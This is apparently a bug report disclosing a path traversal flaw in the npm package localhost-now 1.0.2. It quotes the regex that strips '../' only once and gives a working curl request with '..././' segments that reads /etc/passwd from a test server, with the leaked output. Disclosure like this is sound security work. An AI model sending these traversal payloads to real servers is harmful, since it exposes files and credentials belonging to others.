Hi guys,
I can bypass the URL filter in the localhost-now module.
It allows reading the content of arbitrary files on the remote server.
module name: localhost-now
version: 1.0.2
npm page: https://www.npmjs.com/package/localhost-now
26 downloads in the last week
Lack of file path sanitization (a single regex replace instead of real path resolution) means that any file on the server might be read by a malicious user.
ex: input: url = ..././etc/passwd
when the url goes through replace(/(\.\.[\/\\])+/g, '') the inner ../ is removed exactly once, and the characters left on either side join up into a new ../ -> final result: url = ../etc/passwd (same on Windows for ...\.\ )

// /localhost-now/lib/app.js, line 17:
const file = url === '/' ? '/index.html' : url.replace(/(\.\.[\/\\])+/g, '')
Install: npm install localhost-now
Run localhost-now in your directory:
root@kali:/var/www/html/localhost-now/bin# nodejs localhost
Web Server started on localhost:1337
curl -v --path-as-is http://127.0.0.1:1337/..././..././..././..././..././etc/passwd
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 1337 (#0)
> GET /..././..././..././..././..././etc/passwd HTTP/1.1
> Host: 127.0.0.1:1337
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< content-type: text/
< Date: Mon, 09 Apr 2018 09:04:13 GMT
< Connection: keep-alive
< Content-Length: 2908
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
Thank you.
This vulnerability might be used to read the content of any file on the server.